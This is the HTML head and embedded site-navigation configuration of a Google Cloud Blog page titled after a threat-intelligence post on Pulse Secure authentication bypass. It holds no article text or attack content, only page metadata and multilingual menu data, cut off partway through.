
Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog

<!doctype html><html lang="en-US" dir="ltr"><head><base href="https://cloud.google.com/blog/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><meta name="viewport" content="initial-scale=1, width=device-width"><meta name="track-metadata-page_hosting_platform" content="blog_boq"><meta name="mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="application-name" content="Google Cloud Blog"><meta name="apple-mobile-web-app-title" content="Google Cloud Blog"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="msapplication-tap-highlight" content="no"><link rel="preconnect" href="//fonts.googleapis.com"><link rel="preconnect" href="//fonts.gstatic.com"><link rel="preconnect" href="//www.gstatic.com"><link rel="preconnect" href="//storage.googleapis.com"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Google+Sans+Text_old:400,500,700,400i,500i,700i"><link rel="manifest" crossorigin="use-credentials" href="_/TransformBlogUi/manifest.json"><link rel="home" href="/?lfhs=2"><link rel="msapplication-starturl" href="/?lfhs=2"><link rel="icon" href="//www.gstatic.com/cloud/images/icons/favicon.ico" sizes="32x32"><link rel="apple-touch-icon-precomposed" href="//www.gstatic.com/cloud/images/icons/favicon.ico" sizes="32x32"><link rel="msapplication-square32x32logo" href="//www.gstatic.com/cloud/images/icons/favicon.ico" sizes="32x32"><script data-id="_gd" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.WIZ_global_data = {"Bwo7Jf":"%.@.\"SG\",1]","CGQM5":"%.@.[[1]]]","DpimGf":false,"EP1ykd":["/_/*","/accounts/*","/transform","/transform/*"],"FdrFJe":"-6079753880330604664","Im6cmf":"/blog/_/TransformBlogUi","JvMKJd":"%.@.\"GTM-5CVQBG\",[[\"en\",\"\\u202aEnglish\\u202c\",true,\"en\"],[\"de\",\"\\u202aDeutsch\\u202c\",true,\"de\"],[\"es\",\"\\u202aEspañol\\u202c\",true,\"es\"],[\"es-419\",\"\\u202aEspañol 
(Latinoamérica)\\u202c\",true,\"es-419\"],[\"fr\",\"\\u202aFrançais\\u202c\",true,\"fr\"],[\"id\",\"\\u202aIndonesia\\u202c\",true,\"id\"],[\"it\",\"\\u202aItaliano\\u202c\",true,\"it\"],[\"pt-BR\",\"\\u202aPortuguês (Brasil)\\u202c\",true,\"pt-BR\"],[\"zh-CN\",\"\\u202a简体中文\\u202c\",true,\"zh-Hans\"],[\"zh-TW\",\"\\u202a繁體中文\\u202c\",true,\"zh-Hant\"],[\"ja\",\"\\u202a日本語\\u202c\",true,\"ja\"],[\"ko\",\"\\u202a한국어\\u202c\",true,\"ko\"]],[\"83405\",\"AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg\"],\"en\",null,null,[],[[\"https://cloud.google.com/innovators\",\"https://cloud.google.com/innovators/plus/activate\",\"https://cloud.google.com/innovators/innovatorsplus\"],[\"https://workspace.google.com/pricing\",\"https://www.x.com/googleworkspace\",\"https://www.facebook.com/googleworkspace\",\"https://www.youtube.com/channel/UCBmwzQnSoj9b6HzNmFrg_yw\",\"https://www.instagram.com/googleworkspace\",\"https://www.linkedin.com/showcase/googleworkspace\",\"https://about.google/?utm_source\\u003dworkspace.google.com\\u0026utm_medium\\u003dreferral\\u0026utm_campaign\\u003dgsuite-footer-en\",\"https://about.google/products/?tip\\u003dexplore\",\"https://workspace.google.com\",\"https://workspace.google.com/contact/?source\\u003dgafb-form-globalnav-en\",\"https://workspace.google.com/business/signup/welcome?hl\\u003den\\u0026source\\u003dgafb-form-globalnav-en\",\"https://workspace.google.com/blog\"],[\"https://www.cloudskillsboost.google\",\"https://www.cloudskillsboost.google?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\",\"https://www.cloudskillsboost.google/subscriptions?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreenlaunchpromo\",\"https://www.cloudskillsboost.google/subscriptions?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\",\"https://www.cloudskillsboost.google/catalog?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergree
n\",\"https://www.cloudskillsboost.google/paths?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\"],[\"https://mapsplatform.google.com\"],[\"https://cloud.google.com/developers\",\"https://cloud.google.com/developers/settings?utm_source\\u003dinnovators\"],[\"https://console.cloud.google.com/freetrial\",\"https://console.cloud.google.com/\",\"https://console.cloud.google.com/freetrial?redirectPath\\u003dhttps://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/\"],[\"https://aitestkitchen.withgoogle.com/signup\",\"https://blog.google/technology/ai/join-us-in-the-ai-test-kitchen/\",\"https://cloud.google.com/ai\"],[\"https://googlecloudplatform.blogspot.com/\",\"https://github.com/GoogleCloudPlatform\",\"https://www.linkedin.com/company/google-cloud\",\"https://twitter.com/GoogleCloud_sg\",\"https://www.facebook.com/googlecloud\",\"https://www.youtube.com/GoogleCloudAPAC\"]],[2024,11,24],[[\"en\",\"x-default\"],\"x-default\"],[null,true],null,\"/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/?hl\\u003den\",[\"6LcsrxUqAAAAAFhpR1lXsPN2j2nsTwy6JTbRKzJr\"]]","LVIXXb":1,"LoQv7e":false,"M55kSc":"%.@.]","MT7f9b":[],"MUE6Ne":"TransformBlogUi","PylxI":"%.@.\"cloudblog\",\"topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\",[\"en\",\"de\",\"fr\",\"ko\",\"ja\"],\"en\",null,\"https://cloud.google.com/blog\",\"blog_article\",\"cloud.google.com\",[\"https://console.cloud.google.com/freetrial/\",\"https://cloud.google.com/contact/\",\"https://cloud.google.com/\",\"https://cloud.google.com/blog\",\"https://cloud.google.com/\",\"https://www.google.com/\",\"https://cloud.google.com/products/\",\"https://about.google.com/products/\",\"https://about.google/intl/en/\",\"https://support.google.com\"],[\"googlecloud\",\"googlecloud\",\"showcase/google-cloud\",\"googlecloud/\",\"google
cloud/\"],true]","QrtxK":"","S06Grb":"","S6lZl":105833389,"TSDtV":"%.@.[[null,[[45449436,null,false,null,null,null,\"NCoWOd\"],[45667527,null,false,null,null,null,\"Qzt9sd\"],[45449424,null,null,null,\"default\",null,\"PB4oCc\"],[45532645,null,true,null,null,null,\"wFnpse\"],[45643590,null,false,null,null,null,\"w7jzef\"],[45449433,null,true,null,null,null,\"BotAtd\"],[45662378,null,true,null,null,null,\"DG71uf\"],[45449442,null,true,null,null,null,\"dsKk4d\"],[45449449,null,true,null,null,null,\"b5B1L\"],[45663339,null,false,null,null,null,\"OEmSkb\"],[45664956,null,false,null,null,null,\"aeNUHe\"],[45459555,null,false,null,null,null,\"Imeoqb\"],[45646404,null,false,null,null,null,\"tfPPe\"],[45651445,null,false,null,null,null,\"XzXOC\"],[45449440,null,false,null,null,null,\"j9nUqf\"],[45631885,null,false,null,null,null,\"kG32O\"],[45449445,null,true,null,null,null,\"C4H3Td\"],[45649370,null,false,null,null,null,\"LibkZ\"],[45657332,null,true,null,null,null,\"oBUucf\"],[45449438,null,false,null,null,null,\"m0uJSe\"],[45449471,null,null,null,\"default\",null,\"Ammqqf\"],[45612748,null,false,null,null,null,\"fdXYmb\"],[45449467,null,null,null,\"variant4\",null,\"qL2Vf\"],[45449469,null,null,null,\"default\",null,\"mBNY1\"],[45449443,null,false,null,null,null,\"wvKxS\"],[45616194,null,false,null,null,null,\"y3jdm\"],[45449434,null,true,null,null,null,\"PvZHQ\"],[45449428,null,null,null,\"default\",null,\"cbPi4d\"],[45664077,null,false,null,null,null,\"w1axY\"],[45449423,null,null,null,\"default\",null,\"FIJFKf\"],[45449450,null,false,null,null,null,\"PTNaKe\"],[45632110,null,true,null,null,null,\"QK58Od\"],[45449435,null,false,null,null,null,\"s7Z7Ld\"],[45449446,null,true,null,null,null,\"ktxJzc\"],[45449468,null,null,null,\"variant4\",null,\"BUEcUe\"],[45659313,null,false,null,null,null,\"i2rGv\"],[45532646,null,true,null,null,null,\"RIvlU\"],[45449439,null,true,null,null,null,\"lsuui\"],[45650156,null,false,null,null,null,\"Pr5Lcf\"],[45449422,null,null,null,\"defa
ult\",null,\"epsxQe\"],[45628378,null,true,null,null,null,\"hRRuzd\"],[45651724,null,true,null,null,null,\"xYDLRc\"],[45662552,null,false,null,null,null,\"epuB3d\"],[45449444,null,true,null,null,null,\"HGJqie\"],[45655733,null,true,null,null,null,\"xPTOyb\"],[45663526,null,false,null,null,null,\"kG33G\"]],\"CAMSIB0Z7s2IEJr+BOrvF/2KA82ttBKhkOMGCLWcDQjK9Q15\"]]]","UUFaWc":"%.@.null,1000,2]","Vvafkd":false,"Yllh3e":"%.@.1732460298159204,58923287,4129926886]","aAofAd":"%.@.[[[\"Solutions \\u0026 technology\",null,[[[\"AI \\u0026 Machine Learning\",\"/blog/products/ai-machine-learning\"],[\"API Management\",\"/blog/products/api-management\"],[\"Application Development\",\"/blog/products/application-development\"],[\"Application Modernization\",\"/blog/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/products/chrome-enterprise\"],[\"Compute\",\"/blog/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/products/containers-kubernetes\"],[\"Data Analytics\",\"/blog/products/data-analytics\"],[\"Databases\",\"/blog/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/topics/maps-geospatial\"],[\"Security\",null,[[[\"Security \\u0026 Identity\",\"/blog/products/identity-security\"],[\"Threat Intelligence\",\"/blog/topics/threat-intelligence\"]]]],[\"Infrastructure\",\"/blog/products/infrastructure\"],[\"Infrastructure Modernization\",\"/blog/products/infrastructure-modernization\"],[\"Networking\",\"/blog/products/networking\"],[\"Productivity \\u0026 Collaboration\",\"/blog/products/productivity-collaboration\"],[\"SAP on Google Cloud\",\"/blog/products/sap-google-cloud\"],[\"Storage \\u0026 Data Transfer\",\"/blog/products/storage-data-transfer\"],[\"Sustainability\",\"/blog/topics/sustainability\"]]]],[\"Ecosystem\",null,[[[\"IT Leaders\",\"/transform\"],[\"Industries\",null,[[[\"Financial Services\",\"/blog/topics/financial-services\"],[\"Healthcare \\u0026 Life 
Sciences\",\"/blog/topics/healthcare-life-sciences\"],[\"Manufacturing\",\"/blog/topics/manufacturing\"],[\"Media \\u0026 Entertainment\",\"/blog/products/media-entertainment\"],[\"Public Sector\",\"/blog/topics/public-sector\"],[\"Retail\",\"/blog/topics/retail\"],[\"Supply Chain\",\"/blog/topics/supply-chain-logistics\"],[\"Telecommunications\",\"/blog/topics/telecommunications\"]]]],[\"Partners\",\"/blog/topics/partners\"],[\"Startups \\u0026 SMB\",\"/blog/topics/startups\"],[\"Training \\u0026 Certifications\",\"/blog/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/topics/inside-google-cloud\"],[\"Google Cloud Next \\u0026 Events\",\"/blog/topics/google-cloud-next\"],[\"Google Maps Platform\",\"https://mapsplatform.google.com/resources/blog/\"],[\"Google Workspace\",\"https://workspace.google.com/blog\"]]]],[\"Developers \\u0026 Practitioners\",\"/blog/topics/developers-practitioners\"],[\"Transform with Google Cloud\",\"/transform\"]]],[[\"de\",[[[\"Neuigkeiten\",\"/blog/de/topics/whats-new/aktuelles-auf-dem-google-cloud-blog\"],[\"Lösungen \\u0026 Technologien\",null,[[[\"Anwendungsentwicklung\",\"/blog/de/products/application-development\"],[\"Anwendungsmodernisierung\",\"/blog/de/products/anwendungsmodernisierung\"],[\"API-Verwaltung\",\"/blog/de/products/api-management\"],[\"Chrome Enterprise\",\"/blog/de/products/chrome-enterprise\"],[\"Computing\",\"/blog/de/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/de/products/containers-kubernetes\"],[\"Datenanalysen\",\"/blog/de/products/data-analytics\"],[\"Datenbanken\",\"/blog/de/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/de/products/devops-sre\"],[\"Infrastruktur\",\"/blog/de/products/infrastructure\"],[\"KI \\u0026 Machine Learning\",\"/blog/de/products/ai-machine-learning\"],[\"Maps \\u0026 Geospatial\",\"/blog/de/topics/maps-geospatial\"],[\"Modernisierung der 
Infrastruktur\",\"/blog/de/products/modernisierung-der-infrastruktur\"],[\"Nachhaltigkeit\",\"/blog/de/topics/nachhaltigkeit\"],[\"Netzwerk\",\"/blog/de/products/networking\"],[\"Produktivität und Zusammenarbeit\",\"/blog/de/products/produktivitaet-und-kollaboration\"],[\"SAP in Google Cloud\",\"/blog/de/products/sap-google-cloud\"],[\"Sicherheit \\u0026 Identität\",\"/blog/de/products/identity-security\"],[\"Speicher und Datentransfer\",\"/blog/de/products/storage-data-transfer\"]]]],[\"Ökosystem\",null,[[[\"IT Leader\",\"/transform/de\"],[\"Industrien\",null,[[[\"Behörden und öffentlicher Sektor\",\"/blog/de/topics/public-sector\"],[\"Einzelhandel\",\"/blog/de/topics/retail\"],[\"Fertigung\",\"/blog/de/topics/fertigung\"],[\"Finanzdienstleistungen\",\"/blog/de/topics/financial-services\"],[\"Gesundheitswesen und Biowissenschaften\",\"/blog/de/topics/healthcare-life-sciences\"],[\"Lieferkette und Logistik\",\"/blog/de/topics/lieferkette-und-logistik\"],[\"Medien und Unterhaltung\",\"/blog/de/products/media-entertainment\"],[\"Telekommunikation\",\"/blog/de/topics/telecommunications\"]]]],[\"Entwickler*innen \\u0026 Fachkräfte\",\"/blog/de/topics/developers-practitioners\"],[\"Google Cloud Next \\u0026 Events\",\"/blog/de/topics/events\"],[\"Google Maps Platform\",\"/blog/de/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/de\"],[\"Inside Google Cloud\",\"/blog/de/topics/inside-google-cloud\"],[\"Kunden\",\"/blog/de/topics/kunden\"],[\"Partner\",\"/blog/de/topics/partners\"],[\"Start-ups und KMU\",\"/blog/de/topics/startups\"],[\"Training und Zertifizierung\",\"/blog/de/topics/training-certifications\"]]]],[\"Transformation mit Google Cloud\",\"/transform/de\"]]]],[\"en\",[[[\"Solutions \\u0026 technology\",null,[[[\"AI \\u0026 Machine Learning\",\"/blog/products/ai-machine-learning\"],[\"API Management\",\"/blog/products/api-management\"],[\"Application Development\",\"/blog/products/application-development\"],[\"Application 
Modernization\",\"/blog/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/products/chrome-enterprise\"],[\"Compute\",\"/blog/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/products/containers-kubernetes\"],[\"Data Analytics\",\"/blog/products/data-analytics\"],[\"Databases\",\"/blog/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/topics/maps-geospatial\"],[\"Security\",null,[[[\"Security \\u0026 Identity\",\"/blog/products/identity-security\"],[\"Threat Intelligence\",\"/blog/topics/threat-intelligence\"]]]],[\"Infrastructure\",\"/blog/products/infrastructure\"],[\"Infrastructure Modernization\",\"/blog/products/infrastructure-modernization\"],[\"Networking\",\"/blog/products/networking\"],[\"Productivity \\u0026 Collaboration\",\"/blog/products/productivity-collaboration\"],[\"SAP on Google Cloud\",\"/blog/products/sap-google-cloud\"],[\"Storage \\u0026 Data Transfer\",\"/blog/products/storage-data-transfer\"],[\"Sustainability\",\"/blog/topics/sustainability\"]]]],[\"Ecosystem\",null,[[[\"IT Leaders\",\"/transform\"],[\"Industries\",null,[[[\"Financial Services\",\"/blog/topics/financial-services\"],[\"Healthcare \\u0026 Life Sciences\",\"/blog/topics/healthcare-life-sciences\"],[\"Manufacturing\",\"/blog/topics/manufacturing\"],[\"Media \\u0026 Entertainment\",\"/blog/products/media-entertainment\"],[\"Public Sector\",\"/blog/topics/public-sector\"],[\"Retail\",\"/blog/topics/retail\"],[\"Supply Chain\",\"/blog/topics/supply-chain-logistics\"],[\"Telecommunications\",\"/blog/topics/telecommunications\"]]]],[\"Partners\",\"/blog/topics/partners\"],[\"Startups \\u0026 SMB\",\"/blog/topics/startups\"],[\"Training \\u0026 Certifications\",\"/blog/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/topics/inside-google-cloud\"],[\"Google Cloud Next \\u0026 Events\",\"/blog/topics/google-cloud-next\"],[\"Google Maps 
Platform\",\"https://mapsplatform.google.com/resources/blog/\"],[\"Google Workspace\",\"https://workspace.google.com/blog\"]]]],[\"Developers \\u0026 Practitioners\",\"/blog/topics/developers-practitioners\"],[\"Transform with Google Cloud\",\"/transform\"]]]],[\"fr\",[[[\"Les tendances\",\"/blog/fr/topics/les-tendances/quelles-sont-les-nouveautes-de-google-cloud\"],[\"Solutions et Technologie\",null,[[[\"Analyse de données\",\"/blog/fr/products/analyse-de-donnees/\"],[\"Bases de données\",\"/blog/fr/products/databases\"],[\"Calcul\",\"/blog/fr/products/calcul/\"],[\"Chrome Entreprise\",\"/blog/fr/products/chrome-enterprise/\"],[\"Conteneurs et Kubernetes\",\"/blog/fr/products/conteneurs-et-kubernetes/\"],[\"Développement d\u0027Applications\",\"/blog/fr/products/application-development\"],[\"Développement durable\",\"/blog/fr/topics/developpement-durable\"],[\"DevOps et ingénierie SRE\",\"/blog/fr/products/devops-sre\"],[\"Gestion des API\",\"/blog/fr/products/api-management\"],[\"IA et Machine Learning\",\"/blog/fr/products/ai-machine-learning\"],[\"Infrastructure\",\"/blog/fr/products/infrastructure\"],[\"Maps et Géospatial\",\"/blog/fr/topics/maps-geospatial\"],[\"Modernisation d\u0027Applications\",\"/blog/fr/products/modernisation-dapplications/\"],[\"Modernisation d\u0027Infrastructure\",\"/blog/fr/products/modernisation-dinfrastructure/\"],[\"Networking\",\"/blog/fr/products/networking\"],[\"Productivité et Collaboration\",\"/blog/fr/products/productivite-et-collaboration\"],[\"SAP sur Google Cloud\",\"/blog/fr/products/sap-google-cloud\"],[\"Sécurité et Identité\",\"/blog/fr/products/identity-security\"],[\"Stockage et transfert de données\",\"/blog/fr/products/storage-data-transfer\"]]]],[\"Écosystème\",null,[[[\"Responsables IT\",\"/transform/fr\"],[\"Industries\",null,[[[\"Commerce\",\"/blog/fr/topics/retail\"],[\"Manufacturing\",\"/blog/fr/topics/manufacturing\"],[\"Médias et 
Divertissement\",\"/blog/fr/products/media-entertainment\"],[\"Santé\",\"/blog/fr/topics/healthcare-life-sciences\"],[\"Secteur Public\",\"/blog/fr/topics/public-sector\"],[\"Services Financiers\",\"/blog/fr/topics/financial-services\"],[\"Supply Chain\",\"/blog/fr/topics/supply-chain/\"],[\"Telecommunications\",\"/blog/fr/topics/telecommunications\"]]]],[\"Clients\",\"/blog/fr/topics/clients/\"],[\"Développeurs et professionnels\",\"/blog/fr/topics/developers-practitioners\"],[\"Formations et certifications\",\"/blog/fr/topics/training-certifications\"],[\"Google Cloud Next et Événements\",\"/blog/fr/topics/evenements\"],[\"Google Maps Platform\",\"/blog/fr/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/fr\"],[\"Inside Google Cloud\",\"/blog/fr/topics/inside-google-cloud\"],[\"Partenaires\",\"/blog/fr/topics/partners\"],[\"Start-ups et PME\",\"/blog/fr/topics/startups\"]]]],[\"Transformer avec Google Cloud\",\"/transform/fr\"]]]],[\"ja\",[[[\"ソリューションとテクノロジー\",null,[[[\"AI \\u0026 機械学習\",\"/blog/ja/products/ai-machine-learning\"],[\"API 管理\",\"/blog/ja/products/api-management\"],[\"アプリケーション開発\",\"/blog/ja/products/application-development\"],[\"アプリケーション モダナイゼーション\",\"/blog/ja/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/ja/products/chrome-enterprise\"],[\"コンピューティング\",\"/blog/ja/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/ja/products/containers-kubernetes\"],[\"データ分析\",\"/blog/ja/products/data-analytics\"],[\"データベース\",\"/blog/ja/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/ja/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/ja/products/maps-platform\"],[\"セキュリティ\",null,[[[\"セキュリティ \\u0026 アイデンティティ\",\"/blog/ja/products/identity-security\"],[\"脅威インテリジェンス\",\"/blog/ja/topics/threat-intelligence\"]]]],[\"インフラストラクチャ\",\"/blog/ja/products/infrastructure\"],[\"インフラ 
モダナイゼーション\",\"/blog/ja/products/infrastructure-modernization\"],[\"ネットワーキング\",\"/blog/ja/products/networking\"],[\"生産性とコラボレーション\",\"/blog/ja/products/productivity-collaboration\"],[\"Google Cloud での SAP\",\"/blog/ja/products/sap-google-cloud\"],[\"ストレージとデータ転送\",\"/blog/ja/products/storage-data-transfer\"],[\"サステナビリティ\",\"/blog/ja/topics/sustainability\"]]]],[\"エコシステム\",null,[[[\"ITリーダー\",\"/transform/ja\"],[\"業種\",null,[[[\"金融サービス\",\"/blog/ja/topics/financial-services\"],[\"ヘルスケア、ライフ サイエンス\",\"/blog/ja/topics/healthcare-life-sciences\"],[\"製造\",\"/blog/ja/topics/manufacturing\"],[\"メディア、エンターテイメント\",\"/blog/ja/products/media-entertainment\"],[\"公共部門\",\"/blog/ja/topics/public-sector\"],[\"小売業\",\"/blog/ja/topics/retail\"],[\"サプライ チェーン\",\"/blog/ja/topics/supply-chain-logistics\"],[\"通信\",\"/blog/ja/topics/telecommunications\"]]]],[\"顧客事例\",\"/blog/ja/topics/customers\"],[\"パートナー\",\"/blog/ja/topics/partners\"],[\"スタートアップ \\u0026 SMB\",\"/blog/ja/topics/startups\"],[\"トレーニングと認定\",\"/blog/ja/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/ja/topics/inside-google-cloud\"],[\"Google Cloud Next と イベント\",\"/blog/ja/topics/google-cloud-next\"],[\"Google Maps Platform\",\"/blog/ja/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/ja\"]]]],[\"デベロッパー\",\"/blog/ja/topics/developers-practitioners\"],[\"Transform with Google Cloud\",\"/transform/ja\"]]]],[\"ko\",[[[\"솔루션 및 기술\",null,[[[\"AI 및 머신러닝\",\"/blog/ko/products/ai-machine-learning\"],[\"API 관리\",\"/blog/ko/products/api-management\"],[\"애플리케이션 개발\",\"/blog/ko/products/application-development\"],[\"애플리케이션 현대화\",\"/blog/ko/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/products/chrome-enterprise\"],[\"컴퓨팅\",\"/blog/ko/products/compute\"],[\"컨테이너 \\u0026 Kubernetes\",\"/blog/ko/products/containers-kubernetes\"],[\"데이터 분석\",\"/blog/ko/products/data-analytics\"],[\"데이터베이스\",\"/blog/ko/products/databases\"],[\"DevOps 및 
SRE\",\"/blog/ko/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/ko/products/maps-platform\"],[\"보안\",null,[[[\"보안 \\u0026 아이덴티티\",\"/blog/ko/products/identity-security\"],[\"위협 인텔리전스\",\"/blog/ko/topics/threat-intelligence\"]]]],[\"인프라\",\"/blog/ko/products/infrastructure\"],[\"Infrastructure Modernization\",\"/blog/ko/products/infrastructure-modernization\"],[\"네트워킹\",\"/blog/ko/products/networking\"],[\"생산성 및 공동작업\",\"/blog/ko/products/productivity-collaboration\"],[\"SAP on Google Cloud\",\"/blog/ko/products/sap-google-cloud\"],[\"스토리지 및 데이터 전송\",\"/blog/ko/products/storage-data-transfer\"],[\"지속가능성\",\"/blog/ko/topics/sustainability\"]]]],[\"에코시스템\",null,[[[\"IT Leaders\",\"/transform/ko\"],[\"업종\",null,[[[\"금융 서비스\",\"/blog/ko/topics/financial-services\"],[\"의료 및 생명과학\",\"/blog/ko/topics/healthcare-life-sciences\"],[\"제조업\",\"/blog/ko/topics/manufacturing\"],[\"미디어 및 엔터테인먼트\",\"/blog/ko/products/media-entertainment\"],[\"공공부문\",\"/blog/ko/topics/public-sector\"],[\"소매업\",\"/blog/ko/topics/retail\"],[\"공급망\",\"/blog/topics/supply-chain-logistics\"],[\"통신\",\"/blog/ko/topics/telecommunications\"]]]],[\"고객 사례\",\"/blog/ko/topics/customers\"],[\"파트너\",\"/blog/ko/topics/partners\"],[\"스타트업 \\u0026 SMB\",\"/blog/ko/topics/startups\"],[\"교육 \\u0026 인증\",\"/blog/ko/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/ko/topics/inside-google-cloud\"],[\"Google Cloud Next 및 이벤트\",\"/blog/ko/topics/google-cloud-next\"],[\"Google Maps Platform\",\"/blog/ko/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/ko\"]]]],[\"개발 및 IT운영\",\"/blog/ko/topics/developers-practitioners\"],[\"Google Cloud와 함께 하는 디지털 
혁신\",\"/transform/ko\"]]]]]]","cfb2h":"boq_cloudx-web-blog-uiserver_20241121.08_p0","eptZe":"/blog/_/TransformBlogUi/","f8POw":"%.@.[48887080,97684533,97863170,97785986,93778619,1706538,1714256,97656897,48830069,97863043,48554503,97535270,97517170,48897392,97442197,93874002,48489833,97716269,48887064,97684517,97785970,97656881,97517154,97442181,93873986],null,null,null,null,true]","fPDxwd":[97517170,97684533,97863043,97863170],"gGcLoe":false,"iCzhFc":false,"nQyAE":{"b5B1L":"true","PTNaKe":"false","ktxJzc":"true","BUEcUe":"variant4","XzXOC":"false","kG32O":"false","C4H3Td":"true","w1axY":"false","Pr5Lcf":"false","kG33G":"false","OEmSkb":"false","aeNUHe":"false","j9nUqf":"false","wvKxS":"false","wFnpse":"true","tfPPe":"false","LibkZ":"false","m0uJSe":"false","PvZHQ":"true","s7Z7Ld":"false","i2rGv":"false","RIvlU":"true","lsuui":"true","HGJqie":"true","NCoWOd":"false","Qzt9sd":"false","dsKk4d":"true","fdXYmb":"false","epuB3d":"false","BotAtd":"true"},"p9hQne":"https://www.gstatic.com/_/boq-cloudx-web-blog/_/r/","qwAQke":"TransformBlogUi","rtQCxc":-480,"u4g7r":"%.@.null,1000,2]","vJ2GOe":"%.@.null,[[\"de\",[[[\"Themen\",null,[[[\"Product Announcements\",\"/blog/de/product-announcements\"],[\"KI \\u0026 Machine Learning\",\"/blog/de/ai-machine-learning\"],[\"Produktivität und Kollaboration\",\"/blog/de/productivity-collaboration\"],[\"Identität und Sicherheit\",\"/blog/de/identity-and-security\"],[\"Future of Work\",\"/blog/de/future-of-work\"],[\"Hybrides Arbeiten\",\"/blog/de/hybrid-work\"],[\"Kundenreferenzen\",\"/blog/de/customer-stories\"],[\"Entwickler*innen und Fachkräfte\",\"/blog/de/developers-practitioners\"],[\"Partner\",\"/blog/de/partners\"],[\"Events\",\"/blog/de/events\"],[\"Öffentlicher Sektor\",\"/blog/de/public-sector\"]]]],[\"Produktneuigkeiten\",null,[[[\"Gmail\",\"/blog/de/gmail\"],[\"Meet\",\"/blog/de/meet\"],[\"Chat and 
Spaces\",\"/blog/de/chat-spaces\"],[\"Drive\",\"/blog/de/drive\"],[\"Docs\",\"/blog/de/docs\"],[\"Sheets\",\"/blog/de/sheets\"]]]]]]],[\"en\",[[[\"Topics\",null,[[[\"Product Announcements\",\"/blog/product-announcements\"],[\"AI and Machine Learning\",\"/blog/ai-machine-learning\"],[\"Productivity and Collaboration\",\"/blog/productivity-collaboration\"],[\"Identity and Security\",\"/blog/identity-and-security\"],[\"Future of Work\",\"/blog/future-of-work\"],[\"Hybrid Work\",\"/blog/hybrid-work\"],[\"Customer Stories\",\"/blog/customer-stories\"],[\"Developers and Practitioners\",\"/blog/developers-practitioners\"],[\"Partners\",\"/blog/partners\"],[\"Events\",\"/blog/events\"],[\"Public Sector\",\"/blog/public-sector\"]]]],[\"Product News\",null,[[[\"Gmail\",\"/blog/gmail\"],[\"Meet\",\"/blog/meet\"],[\"Chat and Spaces\",\"/blog/chat-spaces\"],[\"Drive\",\"/blog/drive\"],[\"Docs\",\"/blog/docs\"],[\"Sheets\",\"/blog/sheets\"]]]]]]],[\"fr\",[[[\"Thèmes\",null,[[[\"Product Announcements\",\"/blog/fr/product-announcements\"],[\"IA et Machine Learning\",\"/blog/fr/ai-machine-learning\"],[\"Productivité et Collaboration\",\"/blog/fr/productivity-collaboration\"],[\"Identité et Sécurité\",\"/blog/fr/identity-and-security\"],[\"L\u0027avenir du travail\",\"/blog/fr/future-of-work\"],[\"Travail hybride\",\"/blog/fr/hybrid-work\"],[\"Témoignages Clients\",\"/blog/fr/customer-stories\"],[\"Développeurs et professionnels\",\"/blog/fr/developers-practitioners\"],[\"Partenaires\",\"/blog/fr/partners\"],[\"Événements\",\"/blog/fr/events\"],[\"Secteur Public\",\"/blog/fr/public-sector\"]]]],[\"Annonces sur les produits\",null,[[[\"Gmail\",\"/blog/fr/gmail\"],[\"Meet\",\"/blog/fr/meet\"],[\"Chat et Spaces\",\"/blog/fr/chat-spaces\"],[\"Drive\",\"/blog/fr/drive\"],[\"Docs\",\"/blog/fr/docs\"],[\"Sheets\",\"/blog/fr/sheets\"]]]]]]],[\"ja\",[[[\"トピック\",null,[[[\"プロダクトの発表\",\"/blog/ja/product-announcements\"],[\"AI \\u0026 
